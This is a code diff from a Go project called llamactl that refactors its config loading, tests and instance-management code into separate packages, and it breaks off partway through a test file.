if autoCreate := os.Getenv("LLAMACTL_AUTO_CREATE_DATA_DIR"); autoCreate != "" {
if b, err := strconv.ParseBool(autoCreate); err == nil {
cfg.Instances.AutoCreateDirs = b
}
}
// Instance config
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
cfg.Instances.PortRange = ports
}
}
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
if m, err := strconv.Atoi(maxInstances); err == nil {
cfg.Instances.MaxInstances = m
}
}
if maxRunning := os.Getenv("LLAMACTL_MAX_RUNNING_INSTANCES"); maxRunning != "" {
if m, err := strconv.Atoi(maxRunning); err == nil {
cfg.Instances.MaxRunningInstances = m
}
}
if enableLRUEviction := os.Getenv("LLAMACTL_ENABLE_LRU_EVICTION"); enableLRUEviction != "" {
if b, err := strconv.ParseBool(enableLRUEviction); err == nil {
cfg.Instances.EnableLRUEviction = b
}
}
if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
cfg.Instances.LlamaExecutable = llamaExec
}
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
if b, err := strconv.ParseBool(autoRestart); err == nil {
cfg.Instances.DefaultAutoRestart = b
}
}
if maxRestarts := os.Getenv("LLAMACTL_DEFAULT_MAX_RESTARTS"); maxRestarts != "" {
if m, err := strconv.Atoi(maxRestarts); err == nil {
cfg.Instances.DefaultMaxRestarts = m
}
}
if restartDelay := os.Getenv("LLAMACTL_DEFAULT_RESTART_DELAY"); restartDelay != "" {
if seconds, err := strconv.Atoi(restartDelay); err == nil {
cfg.Instances.DefaultRestartDelay = seconds
}
}
if onDemandStart := os.Getenv("LLAMACTL_DEFAULT_ON_DEMAND_START"); onDemandStart != "" {
if b, err := strconv.ParseBool(onDemandStart); err == nil {
cfg.Instances.DefaultOnDemandStart = b
}
}
if onDemandTimeout := os.Getenv("LLAMACTL_ON_DEMAND_START_TIMEOUT"); onDemandTimeout != "" {
if seconds, err := strconv.Atoi(onDemandTimeout); err == nil {
cfg.Instances.OnDemandStartTimeout = seconds
}
}
if timeoutCheckInterval := os.Getenv("LLAMACTL_TIMEOUT_CHECK_INTERVAL"); timeoutCheckInterval != "" {
if minutes, err := strconv.Atoi(timeoutCheckInterval); err == nil {
cfg.Instances.TimeoutCheckInterval = minutes
}
}
// Auth config
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {
cfg.Auth.RequireInferenceAuth = b
}
}
if inferenceKeys := os.Getenv("LLAMACTL_INFERENCE_KEYS"); inferenceKeys != "" {
cfg.Auth.InferenceKeys = strings.Split(inferenceKeys, ",")
}
if requireManagementAuth := os.Getenv("LLAMACTL_REQUIRE_MANAGEMENT_AUTH"); requireManagementAuth != "" {
if b, err := strconv.ParseBool(requireManagementAuth); err == nil {
cfg.Auth.RequireManagementAuth = b
}
}
if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
}
}
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
func ParsePortRange(s string) [2]int {
var parts []string
// Try both separators
if strings.Contains(s, "-") {
parts = strings.Split(s, "-")
} else if strings.Contains(s, ",") {
parts = strings.Split(s, ",")
}
// Parse the two parts
if len(parts) == 2 {
start, err1 := strconv.Atoi(strings.TrimSpace(parts[0]))
end, err2 := strconv.Atoi(strings.TrimSpace(parts[1]))
if err1 == nil && err2 == nil {
return [2]int{start, end}
}
}
return [2]int{0, 0} // Invalid format
}
// getDefaultDataDirectory returns platform-specific default data directory
func getDefaultDataDirectory() string {
switch runtime.GOOS {
case "windows":
// Try PROGRAMDATA first (system-wide), fallback to LOCALAPPDATA (user)
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
return filepath.Join(programData, "llamactl")
}
if localAppData := os.Getenv("LOCALAPPDATA"); localAppData != "" {
return filepath.Join(localAppData, "llamactl")
}
return "C:\\ProgramData\\llamactl" // Final fallback
case "darwin":
// For macOS, use user's Application Support directory
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, "Library", "Application Support", "llamactl")
}
return "/usr/local/var/llamactl" // Fallback
default:
// Linux and other Unix-like systems
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, ".local", "share", "llamactl")
}
return "/var/lib/llamactl" // Final fallback
}
}
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
case "windows":
// Windows: Use APPDATA if available, else user home, fallback to ProgramData
if appData := os.Getenv("APPDATA"); appData != "" {
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
} else if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
}
locations = append(locations, filepath.Join(os.Getenv("PROGRAMDATA"), "llamactl", "config.yaml"))
case "darwin":
// macOS: Use Application Support in user home, fallback to /Library/Application Support
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"))
}
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
default:
// Linux/Unix: Use ~/.config/llamactl/config.yaml, fallback to /etc/llamactl/config.yaml
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, ".config", "llamactl", "config.yaml"))
}
locations = append(locations, "/etc/llamactl/config.yaml")
}
return locations
}

View File

@@ -1,16 +1,15 @@
package llamactl_test package config_test
import ( import (
"llamactl/pkg/config"
"os" "os"
"path/filepath" "path/filepath"
"testing" "testing"
llamactl "llamactl/pkg"
) )
func TestLoadConfig_Defaults(t *testing.T) { func TestLoadConfig_Defaults(t *testing.T) {
// Test loading config when no file exists and no env vars set // Test loading config when no file exists and no env vars set
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml") cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil { if err != nil {
t.Fatalf("LoadConfig should not error with defaults: %v", err) t.Fatalf("LoadConfig should not error with defaults: %v", err)
} }
@@ -22,12 +21,24 @@ func TestLoadConfig_Defaults(t *testing.T) {
if cfg.Server.Port != 8080 { if cfg.Server.Port != 8080 {
t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port) t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
} }
homedir, err := os.UserHomeDir()
if err != nil {
t.Fatalf("Failed to get user home directory: %v", err)
}
if cfg.Instances.InstancesDir != filepath.Join(homedir, ".local", "share", "llamactl", "instances") {
t.Errorf("Expected default instances directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "instances"), cfg.Instances.InstancesDir)
}
if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
}
if !cfg.Instances.AutoCreateDirs {
t.Error("Expected default instances auto-create to be true")
}
if cfg.Instances.PortRange != [2]int{8000, 9000} { if cfg.Instances.PortRange != [2]int{8000, 9000} {
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange) t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
} }
if cfg.Instances.LogDirectory != "/tmp/llamactl" {
t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory)
}
if cfg.Instances.MaxInstances != -1 { if cfg.Instances.MaxInstances != -1 {
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances) t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
} }
@@ -56,7 +67,7 @@ server:
port: 9090 port: 9090
instances: instances:
port_range: [7000, 8000] port_range: [7000, 8000]
log_directory: "/custom/logs" logs_dir: "/custom/logs"
max_instances: 5 max_instances: 5
llama_executable: "/usr/bin/llama-server" llama_executable: "/usr/bin/llama-server"
default_auto_restart: false default_auto_restart: false
@@ -69,7 +80,7 @@ instances:
t.Fatalf("Failed to write test config file: %v", err) t.Fatalf("Failed to write test config file: %v", err)
} }
cfg, err := llamactl.LoadConfig(configFile) cfg, err := config.LoadConfig(configFile)
if err != nil { if err != nil {
t.Fatalf("LoadConfig failed: %v", err) t.Fatalf("LoadConfig failed: %v", err)
} }
@@ -84,8 +95,8 @@ instances:
if cfg.Instances.PortRange != [2]int{7000, 8000} { if cfg.Instances.PortRange != [2]int{7000, 8000} {
t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange) t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
} }
if cfg.Instances.LogDirectory != "/custom/logs" { if cfg.Instances.LogsDir != "/custom/logs" {
t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory) t.Errorf("Expected logs directory '/custom/logs', got %q", cfg.Instances.LogsDir)
} }
if cfg.Instances.MaxInstances != 5 { if cfg.Instances.MaxInstances != 5 {
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances) t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
@@ -110,7 +121,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
"LLAMACTL_HOST": "0.0.0.0", "LLAMACTL_HOST": "0.0.0.0",
"LLAMACTL_PORT": "3000", "LLAMACTL_PORT": "3000",
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000", "LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
"LLAMACTL_LOG_DIR": "/env/logs", "LLAMACTL_LOGS_DIR": "/env/logs",
"LLAMACTL_MAX_INSTANCES": "20", "LLAMACTL_MAX_INSTANCES": "20",
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server", "LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
"LLAMACTL_DEFAULT_AUTO_RESTART": "false", "LLAMACTL_DEFAULT_AUTO_RESTART": "false",
@@ -124,7 +135,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
defer os.Unsetenv(key) defer os.Unsetenv(key)
} }
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml") cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil { if err != nil {
t.Fatalf("LoadConfig failed: %v", err) t.Fatalf("LoadConfig failed: %v", err)
} }
@@ -139,8 +150,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
if cfg.Instances.PortRange != [2]int{5000, 6000} { if cfg.Instances.PortRange != [2]int{5000, 6000} {
t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange) t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
} }
if cfg.Instances.LogDirectory != "/env/logs" { if cfg.Instances.LogsDir != "/env/logs" {
t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory) t.Errorf("Expected logs directory '/env/logs', got %q", cfg.Instances.LogsDir)
} }
if cfg.Instances.MaxInstances != 20 { if cfg.Instances.MaxInstances != 20 {
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances) t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
@@ -183,7 +194,7 @@ instances:
defer os.Unsetenv("LLAMACTL_HOST") defer os.Unsetenv("LLAMACTL_HOST")
defer os.Unsetenv("LLAMACTL_MAX_INSTANCES") defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")
cfg, err := llamactl.LoadConfig(configFile) cfg, err := config.LoadConfig(configFile)
if err != nil { if err != nil {
t.Fatalf("LoadConfig failed: %v", err) t.Fatalf("LoadConfig failed: %v", err)
} }
@@ -219,7 +230,7 @@ instances:
t.Fatalf("Failed to write test config file: %v", err) t.Fatalf("Failed to write test config file: %v", err)
} }
_, err = llamactl.LoadConfig(configFile) _, err = config.LoadConfig(configFile)
if err == nil { if err == nil {
t.Error("Expected LoadConfig to return error for invalid YAML") t.Error("Expected LoadConfig to return error for invalid YAML")
} }
@@ -245,7 +256,7 @@ func TestParsePortRange(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
result := llamactl.ParsePortRange(tt.input) result := config.ParsePortRange(tt.input)
if result != tt.expected { if result != tt.expected {
t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected) t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
} }
@@ -260,31 +271,31 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
testCases := []struct { testCases := []struct {
envVar string envVar string
envValue string envValue string
checkFn func(*llamactl.Config) bool checkFn func(*config.AppConfig) bool
desc string desc string
}{ }{
{ {
envVar: "LLAMACTL_PORT", envVar: "LLAMACTL_PORT",
envValue: "invalid-port", envValue: "invalid-port",
checkFn: func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
desc: "invalid port number should keep default", desc: "invalid port number should keep default",
}, },
{ {
envVar: "LLAMACTL_MAX_INSTANCES", envVar: "LLAMACTL_MAX_INSTANCES",
envValue: "not-a-number", envValue: "not-a-number",
checkFn: func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
desc: "invalid max instances should keep default", desc: "invalid max instances should keep default",
}, },
{ {
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART", envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
envValue: "invalid-bool", envValue: "invalid-bool",
checkFn: func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
desc: "invalid boolean should keep default", desc: "invalid boolean should keep default",
}, },
{ {
envVar: "LLAMACTL_INSTANCE_PORT_RANGE", envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
envValue: "invalid-range", envValue: "invalid-range",
checkFn: func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
desc: "invalid port range should keep default", desc: "invalid port range should keep default",
}, },
} }
@@ -294,7 +305,7 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
os.Setenv(tc.envVar, tc.envValue) os.Setenv(tc.envVar, tc.envValue)
defer os.Unsetenv(tc.envVar) defer os.Unsetenv(tc.envVar)
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml") cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil { if err != nil {
t.Fatalf("LoadConfig failed: %v", err) t.Fatalf("LoadConfig failed: %v", err)
} }
@@ -323,7 +334,7 @@ server:
t.Fatalf("Failed to write test config file: %v", err) t.Fatalf("Failed to write test config file: %v", err)
} }
cfg, err := llamactl.LoadConfig(configFile) cfg, err := config.LoadConfig(configFile)
if err != nil { if err != nil {
t.Fatalf("LoadConfig failed: %v", err) t.Fatalf("LoadConfig failed: %v", err)
} }

View File

@@ -1,253 +0,0 @@
package llamactl
import (
"context"
"encoding/json"
"fmt"
"io"
"log"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"time"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
// RestartDelay duration in seconds
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
LlamaServerOptions `json:",inline"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
// This is needed because the embedded LlamaServerOptions has its own UnmarshalJSON
// which can interfere with proper unmarshaling of the pointer fields
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
}
var temp tempCreateOptions
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Copy the pointer fields
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
return err
}
return nil
}
// Instance represents a running instance of the llama server
type Instance struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalSettings *InstancesConfig
// Status
Running bool `json:"running"`
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// Logging file
logger *InstanceLogger `json:"-"`
// internal
cmd *exec.Cmd `json:"-"` // Command to run the instance
ctx context.Context `json:"-"` // Context for managing the instance lifecycle
cancel context.CancelFunc `json:"-"` // Function to cancel the context
stdout io.ReadCloser `json:"-"` // Standard output stream
stderr io.ReadCloser `json:"-"` // Standard error stream
mu sync.RWMutex `json:"-"` // RWMutex for better read/write separation
restarts int `json:"-"` // Number of restarts
proxy *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
}
// validateAndCopyOptions validates and creates a deep copy of the provided options
// It applies validation rules and returns a safe copy
func validateAndCopyOptions(name string, options *CreateInstanceOptions) *CreateInstanceOptions {
optionsCopy := &CreateInstanceOptions{}
if options != nil {
// Copy the embedded LlamaServerOptions
optionsCopy.LlamaServerOptions = options.LlamaServerOptions
// Copy and validate pointer fields
if options.AutoRestart != nil {
autoRestart := *options.AutoRestart
optionsCopy.AutoRestart = &autoRestart
}
if options.MaxRestarts != nil {
maxRestarts := *options.MaxRestarts
if maxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, maxRestarts)
maxRestarts = 0
}
optionsCopy.MaxRestarts = &maxRestarts
}
if options.RestartDelay != nil {
restartDelay := *options.RestartDelay
if restartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, restartDelay)
restartDelay = 0
}
optionsCopy.RestartDelay = &restartDelay
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *InstancesConfig) {
if globalSettings == nil {
return
}
if options.AutoRestart == nil {
defaultAutoRestart := globalSettings.DefaultAutoRestart
options.AutoRestart = &defaultAutoRestart
}
if options.MaxRestarts == nil {
defaultMaxRestarts := globalSettings.DefaultMaxRestarts
options.MaxRestarts = &defaultMaxRestarts
}
if options.RestartDelay == nil {
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *InstancesConfig, options *CreateInstanceOptions) *Instance {
// Validate and copy options
optionsCopy := validateAndCopyOptions(name, options)
// Apply defaults
applyDefaultOptions(optionsCopy, globalSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogDirectory)
return &Instance{
Name: name,
options: optionsCopy,
globalSettings: globalSettings,
logger: logger,
Running: false,
Created: time.Now().Unix(),
}
}
func (i *Instance) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Instance) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
if options == nil {
log.Println("Warning: Attempted to set nil options on instance", i.Name)
return
}
// Validate and copy options and apply defaults
optionsCopy := validateAndCopyOptions(i.Name, options)
applyDefaultOptions(optionsCopy, i.globalSettings)
i.options = optionsCopy
// Clear the proxy so it gets recreated with new options
i.proxy = nil
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
if i.proxy == nil {
if i.options == nil {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", i.options.Host, i.options.Port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
}
i.proxy = httputil.NewSingleHostReverseProxy(targetURL)
}
return i.proxy, nil
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Instance) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
// Create a temporary struct with exported fields for JSON marshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
}{
Name: i.Name,
Options: i.options,
Running: i.Running,
}
return json.Marshal(temp)
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Instance) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
}{}
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Set the fields
i.Name = temp.Name
i.Running = temp.Running
// Handle options with validation but no defaults
if temp.Options != nil {
i.options = validateAndCopyOptions(i.Name, temp.Options)
}
return nil
}

223
pkg/instance/instance.go Normal file
View File

@@ -0,0 +1,223 @@
package instance
import (
"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/config"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"sync/atomic"
"time"
)
// TimeProvider interface allows for testing with mock time
type TimeProvider interface {
Now() time.Time
}
// realTimeProvider implements TimeProvider using the actual time
type realTimeProvider struct{}
func (realTimeProvider) Now() time.Time {
return time.Now()
}
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalSettings *config.InstancesConfig
// Status
Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// Logging file
logger *InstanceLogger `json:"-"`
// internal
cmd *exec.Cmd `json:"-"` // Command to run the instance
ctx context.Context `json:"-"` // Context for managing the instance lifecycle
cancel context.CancelFunc `json:"-"` // Function to cancel the context
stdout io.ReadCloser `json:"-"` // Standard output stream
stderr io.ReadCloser `json:"-"` // Standard error stream
mu sync.RWMutex `json:"-"` // RWMutex for better read/write separation
restarts int `json:"-"` // Number of restarts
proxy *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
// Timeout management
lastRequestTime atomic.Int64 // Unix timestamp of last request
timeProvider TimeProvider `json:"-"` // Time provider for testing
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
// Validate and copy options
options.ValidateAndApplyDefaults(name, globalSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogsDir)
return &Process{
Name: name,
options: options,
globalSettings: globalSettings,
logger: logger,
timeProvider: realTimeProvider{},
Created: time.Now().Unix(),
Status: Stopped,
onStatusChange: onStatusChange,
}
}
func (i *Process) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
return i.options.LlamaServerOptions.Port
}
}
return 0
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
return i.options.LlamaServerOptions.Host
}
}
return ""
}
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
if options == nil {
log.Println("Warning: Attempted to set nil options on instance", i.Name)
return
}
// Validate and copy options
options.ValidateAndApplyDefaults(i.Name, i.globalSettings)
i.options = options
// Clear the proxy so it gets recreated with new options
i.proxy = nil
}
// SetTimeProvider sets a custom time provider for testing
func (i *Process) SetTimeProvider(tp TimeProvider) {
i.timeProvider = tp
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
if i.proxy != nil {
return i.proxy, nil
}
if i.options == nil {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
}
var host string
var port int
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
host = i.options.LlamaServerOptions.Host
port = i.options.LlamaServerOptions.Port
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
}
proxy := httputil.NewSingleHostReverseProxy(targetURL)
proxy.ModifyResponse = func(resp *http.Response) error {
// Remove CORS headers from llama-server response to avoid conflicts
// llamactl will add its own CORS headers
resp.Header.Del("Access-Control-Allow-Origin")
resp.Header.Del("Access-Control-Allow-Methods")
resp.Header.Del("Access-Control-Allow-Headers")
resp.Header.Del("Access-Control-Allow-Credentials")
resp.Header.Del("Access-Control-Max-Age")
resp.Header.Del("Access-Control-Expose-Headers")
return nil
}
i.proxy = proxy
return i.proxy, nil
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Process) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
// Use anonymous struct to avoid recursion
type Alias Process
return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
}{
Alias: (*Alias)(i),
Options: i.options,
})
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Process) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias Process
aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
}{
Alias: (*Alias)(i),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Handle options with validation and defaults
if aux.Options != nil {
aux.Options.ValidateAndApplyDefaults(i.Name, i.globalSettings)
i.options = aux.Options
}
return nil
}

View File

@@ -0,0 +1,375 @@
package instance_test
import (
"encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"testing"
)
func TestNewInstance(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if inst.IsRunning() {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &instance.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
